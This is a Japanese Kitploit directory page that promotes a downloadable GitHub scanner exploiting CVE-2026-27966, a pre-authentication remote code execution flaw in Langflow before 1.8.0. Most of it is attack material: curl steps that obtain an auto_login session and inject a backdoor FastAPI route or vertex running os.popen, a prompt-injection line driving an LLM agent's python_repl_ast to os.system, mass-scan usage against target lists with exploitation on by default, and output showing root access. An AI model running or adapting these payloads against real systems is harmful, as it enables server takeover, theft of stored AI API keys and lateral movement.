Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-27966 — Langflow < 1.8.0 向けの認証前 RCE スキャナー — Route Injection + Vertex Injection → コード実行(CVSS 9.8) | Kitploit
ツール/GitHubGitHub/shinthink/cve-2026-27966
偵察脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールAIセキュリティ
GitHubshinthink/cve-2026-27966

CVE-2026-27966

Langflow < 1.8.0 向けの認証前 RCE スキャナー — Route Injection + Vertex Injection → コード実行(CVSS 9.8)

リポジトリを見る
232ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-27966 — Langflow リモートコード実行スキャナ

認証前ルートインジェクション + 頂点(Vertex)インジェクション → Python コード実行


概要

CVE-2026-27966 は、Langflow 1.8.0 より前のバージョンに存在する、深刻度が重大(CVSS 9.8)の事前認証リモートコード実行の脆弱性です。この脆弱性は、CSV Agent コンポーネントで allow_dangerous_code=True がハードコードされていることに起因し、LangChain の python_repl_ast ツールが認証なしのプロンプトインジェクションにさらされます。

さらに、複数の API エンドポイントに適切な認証がないため、CSV Agent が構成されていないインスタンスでも、直接的なルートインジェクションとフロー頂点インジェクションが可能になります。

影響を受けるバージョン

Langflow バージョン状態
< 1.8.0脆弱
>= 1.8.0パッチ適用済み

攻撃ベクター

このスキャナは、3 つの異なる悪用手順をテストします:

1. ルートインジェクション(auto_login バイパス)

root@kitploit:~
GET  /api/v1/auto_login          → obtain session / API key
POST /api/v1/custom_component    → register backdoor route
GET  /api/{backdoor}?c=command   → RCE

2. 直接ルートインジェクション(API キー不要)

root@kitploit:~
POST /api/v1/custom_component    → register backdoor route
GET  /api/{backdoor}?c=command   → RCE

3. ビルド頂点インジェクション(認証なしビルド)

root@kitploit:~
GET  /api/v1/flows/basic_examples  → extract flow UUIDs (26 exposed)
POST /api/v1/build/{UUID}/vertices → inject malicious vertex
POST /api/v1/run/{UUID}            → execute vertex code → RCE

脆弱性のメカニズム

根本原因

src/lfx/src/lfx/components/langchain_utilities/csv_agent.py 内で、CSV Agent ノードが allow_dangerous_code=True をハードコードしており、LangChain の python_repl_ast ツールが自動的に公開されます:

root@kitploit:~
agent_kwargs = {
    "verbose": self.verbose,
    "allow_dangerous_code": True,  # hardcoded — cannot be disabled via UI
}
agent_csv = create_csv_agent(..., **agent_kwargs)

これにより、CSV Agent に到達する任意のプロンプトが、以下の方法で任意の Python コードを実行できるようになります:

root@kitploit:~
Action: python_repl_ast
Action Input: __import__("os").system("command")

認証なし API サーフェス

Langflow REST API は、認証なしで公開されている複数のエンドポイントを提供します:

auto_login による認証バイパス

auto_login が有効なインスタンス(多くの Docker デプロイでデフォルト)では、攻撃者は有効なセッションと API キーを取得します:

root@kitploit:~
curl -sk 'https://target.com/api/v1/auto_login'
# Returns session with access_token → full API access

有効な API キーがあれば、攻撃者は POST /api/v1/custom_component を使用して、サーバー再起動までメモリ上に残るバックドア FastAPI ルートを登録できます:

root@kitploit:~
from fastapi import APIRouter, Query
router = APIRouter()
@router.get("/sh")
async def cmd(c: str = Query("")):
    import os
    return os.popen(c).read()
app.include_router(router, prefix="/api")

CVSS 9.8 の理由


インストール

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-27966.git
cd CVE-2026-27966
pip install -r requirements.txt

使用方法

root@kitploit:~
# Single target
python cve_2026_27966.py -t target.com:7860

# Mass scan
python cve_2026_27966.py -f targets.txt

# Mass scan + save results
python cve_2026_27966.py -f targets.txt -o rce.txt

# Detect only (skip exploitation)
python cve_2026_27966.py -f targets.txt --no-exploit

# Verbose output
python cve_2026_27966.py -f targets.txt -v

引数

root@kitploit:~
  -t, --target      Single target (IP:port or domain)
  -f, --file        Target list, one per line
  -o, --output      Save RCE results to file
  --threads         Concurrent workers (default: 30)
  --no-exploit      Detection only, skip RCE attempts
  -v, --verbose     Show all results including non-RCE targets

概念実証(PoC)

検出と悪用

root@kitploit:~
$ python cve_2026_27966.py -t target.com:7860 -v
root@kitploit:~
  CVE-2026-27966 — Langflow RCE Scanner
  CVSS 9.8 | Pre-Auth | Route Injection → RCE

  Host     : target.com:7860
  Langflow : YES v1.2.0
  Vuln     : YES
  API Key  : NOT REQUIRED
  RCE      : YES
  Output   : uid=0(root) gid=0(root) groups=0(root)
  Time     : 12.3s

マススキャン出力

root@kitploit:~
  CVE-2026-27966 Langflow RCE Scanner
  Targets: 4127 | Threads: 30 | Exploit: ON
  -------------------------------------------------------

  [RCE]  192.168.10.50     v1.2.0    7.3s
         uid=0(root) gid=0(root) groups=0(root)
  [AUTH] target.internal:4433 v1.2.0   14.1s  (API key)
  [500/4127] scanning... (12%)

  -------------------------------------------------------
  Total: 4127 | Langflow: 47 | RCE: 3 | API-Protected: 41
  -------------------------------------------------------

手動での悪用

ステップ 1 — Langflow の検出

root@kitploit:~
curl -sk 'https://target.com/api/v1/version'
# {"version":"1.2.0","main_version":"1.2.0","package":"Langflow"}

ステップ 2 — フロー UUID の抽出

root@kitploit:~
curl -sk 'https://target.com/api/v1/flows/basic_examples/' | jq '.[0].id'
# "bb0a7390-22a1-4a2e-8d7c-15463e53d9f2"

ステップ 3 — バックドア頂点のインジェクション

root@kitploit:~
curl -sk -X POST 'https://target.com/api/v1/build/{UUID}/vertices' \
  -H 'Content-Type: application/json' \
  -d '{"id":"bkdr","type":"CustomComponent","data":{"code":"from fastapi import APIRouter\nrouter=APIRouter()\[email protected](\"/sh\")\nasync def cmd(c:str=\"\"):import os;return os.popen(c).read()\napp.include_router(router,prefix=\"/api\")","display_name":"X"}}'

ステップ 4 — コマンドの実行

root@kitploit:~
curl -sk 'https://target.com/api/sh?c=id;hostname;uname -a'

影響

悪用に成功すると、Langflow Docker コンテナ内で root としてのリモートコード実行が可能になります。そこから攻撃者は以下を行えます:

  • Langflow の SQLite データベースから API キーを抽出する(OpenAI、Anthropic、Gemini など)
  • 接続されたベクターデータベースや外部サービスにアクセスする
  • カスタムコンポーネントを介して永続的なバックドアを展開する
  • 内部ネットワークにピボットする
  • クリプトマイナーや C2 インフラストラクチャを展開する

免責事項

教育目的および許可されたテスト目的のみで使用してください。

本ソフトウェアは、許可を得たペネトレーションテストを実施するセキュリティ専門家、自社インフラストラクチャを監査する組織、および脆弱性の悪用を研究する研究者を対象としています。

コンピュータシステムへの不正アクセスは違法であり、以下の法律に違反する可能性があります:

  • 米国:Computer Fraud and Abuse Act(18 U.S.C. 1030)
  • インドネシア:UU ITE 第 30 条および第 46 条
  • 欧州連合:指令 2013/40/EU
  • 英国:Computer Misuse Act 1990

著作者は不正使用に対するいかなる責任も負いません。本ソフトウェアを使用することにより、お客様はご自身の行動に対するすべての責任を受け入れるものとします。


参考情報

リソースリンク

このプロジェクトは Langflow または Logspace とは提携していません。

ツールをダウンロード
エンドポイント認証公開されるデータ
GET /api/v1/versionなしLangflow のバージョン
GET /api/v1/healthなしインスタンスの状態
GET /api/v1/flows/basic_examples/なし26 個のサンプルフロー UUID + 構造
POST /api/v1/build/{uuid}/verticesなし任意のコードインジェクションを受け入れる
POST /api/v1/users/なしユーザー作成(非アクティブ)
GET /openapi.jsonなし全 API ドキュメント
メトリック値
攻撃元ネットワーク(リモート)
攻撃複雑性低
必要な権限なし
ユーザー操作なし
スコープ変更なし
機密性高
完全性高
可用性高
GitHub AdvisoryGHSA-3645-fxcv-hqr4
修正コミットd8c6480d
Metasploit モジュールRapid7
NVD エントリCVE-2026-27966